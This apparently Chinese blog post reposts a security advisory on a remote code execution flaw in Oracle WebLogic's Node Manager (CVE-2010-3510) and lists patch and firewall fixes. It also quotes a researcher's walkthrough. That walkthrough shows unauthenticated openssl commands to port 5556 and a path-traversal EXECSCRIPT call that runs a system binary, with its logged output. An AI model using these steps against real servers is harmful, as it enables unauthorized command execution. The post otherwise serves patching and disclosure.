根据来自http://xforce.iss.net/xforce/xfdb/64765的报告,WebLogic的Node Manager有一个高危漏洞: Oracle WebLogic Server Node Manager code execution, 影响的版本包括了几乎所有最近版本的WebLogic软件:9.0, 9.1, 9.2.3, 10.0.2, 10.3.2, and 10.3.3.

解决办法:

  1. 升级至最新的WebLogic 9.2.4或10.3.5.

  2. 或下载对应的补丁: http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html

  3. 或通过防火墙对相关端口和服务进行外网屏蔽.

 

Oracle的Critical Patch Updates and Security Alerts网站地址: http://www.oracle.com/technetwork/topics/security/alerts-086861.html

 

相关资料转载:

http://xforce.iss.net/xforce/xfdb/64765

Oracle WebLogic Server Node Manager code execution

weblogic-node-manager-code-exec (64765)
The risk level is classified as HighHigh Risk

Description:

An unspecified vulnerability in Oracle WebLogic Server within the Node Manager could allow a remote attacker to execute arbitrary code on the system.

*CVSS:

Base Score:
10

  Access Vector:
Network

  Access Complexity:
Low

  Authentication:
None

  Confidentiality Impact:
Complete

  Integrity Impact:
Complete

  Availability Impact:
Complete

Temporal Score:
7.4

  Exploitability:
Unproven

  Remediation Level:
Official-Fix

  Report Confidence:
Confirmed

Consequences:

Gain Access

Remedy:

Refer to Oracle Critical Patch Update Advisory – January 2011 for patch, upgrade or suggested workaround information. See References.

References:

  • Oracle Critical Patch Update Advisory – January 2011: Oracle Critical Patch Update Advisory – January 2011.
  • BID-45847: Oracle WebLogic Server CVE-2010-3510 Remote Security Vulnerability
  • CVE-2010-3510: Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 9.0, 9.1, 9.2.3, 10.0.2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Node Manager.
  • SA42975: Oracle WebLogic Server Three Vulnerabilities
  • SECTRACK ID: 1024981: Oracle Fusion Middleware Flaws Let Remote Users Execute Arbitrary Code, Access and Modify Data, and Deny Service
  • VUPEN/ADV-2011-0143: Oracle Fusion Middleware Multiple Code Execution and Security Bypass

Platforms Affected:

  • Oracle WebLogic Server 10.3.2
  • Oracle WebLogic Server 10.3.3
  • Oracle WebLogic Server 9.0
  • Oracle WebLogic Server 9.1

Reported:

Jan 19, 2011

The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (IBM Internet Security Systems X-Force) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.

For corrections or additions please email xforce@iss.net

Return to the main page

  • According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an “industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.” IBM PROVIDES THE CVSS SCORES “AS IS” WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.
    The information within this database may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall IBM be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
About IBM Internet Security Systems

IBM Internet Security Systems is a trusted security advisor to thousands of the world’s leading businesses and governments, helping to provide pre-emptive protection for networks, desktops and servers. The IBM Proventia? integrated security platform is designed to automatically protect against both known and unknown threats, helping to keep networks up and running and shield customers from online attacks before they impact business assets. IBM Internet Security Systems products and services are based on the proactive security intelligence of its X-Force? research and development team ? an unequivocal world authority in vulnerability and threat research. The IBM Internet Security Systems product line is also complemented by comprehensive Managed Security Services and Professional Security Services. For more information, visit the IBM Internet Security Systems Web site at www.iss.net or call 800-776-2362.

 

Oracle Weblogic 10.3.2 Node Manager fun http://www.nosec.org/2010/0209/395.html

 

Time for the final bug in our Week of Web Server bugs.
It is in Vulndisco since Oct, 2008.
Oracle Weblogic has an optional Node Manager utility which is used to start/stop server instances from a remo

Time for the final bug in our Week of Web Server bugs.

It is in Vulndisco since Oct, 2008.

Oracle Weblogic has an optional Node Manager utility which is used to start/stop server instances from a remote location.

It is important to know that Node Manager is beasvc.exe process which listens on port 5556.

It supports several commands, no authentication is required to enter some of these commands, you will only need to know the name of Weblogic domain (btw in the default install Weblogic has at least 2 domains – wl_server and medrec). As beasvc.exe speaks over SSL we will use openssl utility:

character ‘>’ marks the beginning of our command (write the command after ‘>’ and press Enter)

$ openssl s_client -host 192.168.56.101 -port 5556

HELLO asdf

+OK Node manager v10.3 started

Remote version leak bug here 😉

DOMAIN xyz

-ERR I/O error while reading domain directory

GETNMLOG

java.io.FileNotFoundException: Domain directory ‘C:OracleMiddlewarewlserver_10.3commonnodemanager’ invalid (domain salt file not found)

at weblogic.nodemanager.server.DomainManager.initialize(DomainManager.java:79)

at weblogic.nodemanager.server.DomainMan

ager.(DomainManager.java:54)

at weblogic.nodemanager.server.NMServer.getDomainManager(NMServer.java:257)

at weblogic.nodemanager.server.Handler.handleDomain(Handler.java:218)

at weblogic.nodemanager.server.Handler.handleCommand(Handler.java:108)

at weblogic.nodemanager.server.Handler.run(Handler.java:70)

at java.lang.Thread.run(Thread.java:619)

DOMAIN wl_server

+OK Current domain set to ‘wl_server’

>EXECSCRIPT ../../../../../../../../Windows/System32/ping.exe

-ERR 1

GETNMLOG

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <Usage: ping \[-t\] \[-a\] \[-n count\] \[-l size\] \[-f\] \[-i TTL\] [-v TOS]>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <            \[-r count\] \[-s count\] [[-j host-list] | [-k host-list]]>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <            \[-w timeout\] \[-R\] \[-S srcaddr\] \[-4\] [-6] target_name>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <    -t             Ping the specified host until stopped.>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <                   To see statistics and continue – type Control-Break;>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <                   To stop – type Control-C.>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <    -a             Resolve addresses to hostnames.>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <    -n count       Number of echo requests to send.>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <    -l size        Send buffer size.>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <    -f             Set Don’t Fragment flag in packet (IPv4-only).>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <    -i TTL         Time To Live.>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <    -v TOS         Type Of Service (IPv4-only).>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <    -r count       Record route for count hops (IPv4-only).>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <    -s count       Timestamp for count hops (IPv4-only).>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <    -j host-list   Loose source route along host-list (IPv4-only).>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <    -k host-list   Strict source route along host-list (IPv4-only).>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <    -w timeout     Timeout in milliseconds to wait for each reply.>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <    -R             Use routing header to test reverse route also (IPv6-only). >

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <    -S srcaddr     Source address to use.>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <    -4             Force using IPv4.>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <    -6             Force using IPv6.>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <>

<Jan 22, 2010 6:37:51 AM> <>

.

+OK Node manager log file sent

Obviously it is a remote preauth command execution bug!

 

NodeMangar 手工攻击: http://book.51cto.com/art/201110/295927.htm

转载请注明:WebLogic Android 博客 » WebLogic NodeManager 远程攻击漏洞补丁下载[整理]